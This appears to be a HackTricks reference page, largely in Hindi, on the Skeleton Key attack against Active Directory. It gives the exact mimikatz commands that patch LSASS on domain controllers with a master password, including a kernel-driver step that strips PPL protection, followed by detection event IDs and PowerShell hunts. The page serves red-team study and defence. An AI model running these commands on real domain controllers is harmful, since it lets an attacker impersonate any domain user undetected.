Skeleton Key
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Skeleton Key Attack
The Skeleton Key attack एक तकनीक है जो हमलावरों को प्रत्येक domain controller के LSASS प्रोसेस में injecting a master password करके bypass Active Directory authentication करने की अनुमति देती है। इंजेक्शन के बाद, master password (default mimikatz) का उपयोग किसी भी domain user के रूप में प्रमाणीकृत करने के लिए किया जा सकता है जबकि उनके वास्तविक पासवर्ड अभी भी काम करते हैं।
Key facts:
- प्रत्येक DC पर Domain Admin/SYSTEM + SeDebugPrivilege की आवश्यकता होती है और इसे reapplied after each reboot करना पड़ता है।
- NTLM और Kerberos RC4 (etype 0x17) validation paths को patch करता है; केवल AES‑only realms या AES अनिवार्य करने वाले अकाउंट not accept the skeleton key।
- तीसरे‑पक्ष के LSA authentication packages या अतिरिक्त smart‑card / MFA providers के साथ टकराव हो सकता है।
- The Mimikatz module accepts the optional switch
/letaesto avoid touching Kerberos/AES hooks in case of compatibility issues.
क्रियान्वयन
Classic, non‑PPL protected LSASS:
mimikatz # privilege::debug
mimikatz # misc::skeleton
यदि LSASS is running as PPL (RunAsPPL/Credential Guard/Windows 11 Secure LSASS), LSASS को पैच करने से पहले सुरक्षा हटाने के लिए एक kernel driver की आवश्यकता होती है:
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove # drop PPL
mimikatz # misc::skeleton # inject master password 'mimikatz'
इंजेक्शन के बाद, किसी भी domain खाते से प्रमाणीकृत करें लेकिन पासवर्ड के रूप में mimikatz (या ऑपरेटर द्वारा सेट की गई वैल्यू) का उपयोग करें। मल्टी‑DC वातावरण में इसे सभी DCs पर दोहराना याद रखें।
Mitigations
- लॉग मॉनिटरिंग
- अनसाइन्ड ड्राइवर्स जैसे
mimidrv.sysके लिए System Event ID 7045 (service/driver install)। - Sysmon:
mimidrv.sysके लिए Event ID 7 (driver load); गैर‑सिस्टम प्रोसेस सेlsass.exeतक संदिग्ध पहुंच के लिए Event ID 10। - संवेदनशील privilege उपयोग या LSA authentication package रजिस्ट्रेशन असामान्यताओं के लिए Security Event ID 4673/4611; DCs से RC4 (etype 0x17) का उपयोग करके अनपेक्षित 4624 लॉगऑन के साथ correlate करें।
- LSASS हार्डनिंग
- attackers को kernel‑mode driver तैनाती की ओर मजबूर करने के लिए DCs पर RunAsPPL/Credential Guard/Secure LSASS सक्षम रखें (अधिक telemetry, exploitation कठिन)।
- जहाँ संभव हो legacy RC4 को अक्षम करें; Kerberos टिकट्स को AES तक सीमित करने से उस RC4 hook path को रोका जा सकता है जिसका उपयोग skeleton key करता है।
- त्वरित PowerShell हंट्स:
- अनसाइन्ड kernel driver इंस्टॉल का पता लगाएँ:
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"} - Mimikatz driver की तलाश:
Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"} - रीबूट के बाद PPL लागू है यह सत्यापित करें:
Get-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like "*protected process*"}
अतिरिक्त credential‑hardening मार्गदर्शन के लिए देखें Windows credentials protections.
संदर्भ
- Netwrix – Skeleton Key attack in Active Directory (2022)
- TheHacker.recipes – Skeleton key (2026)
- TheHacker.Tools – Mimikatz misc::skeleton module
Tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें:HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।


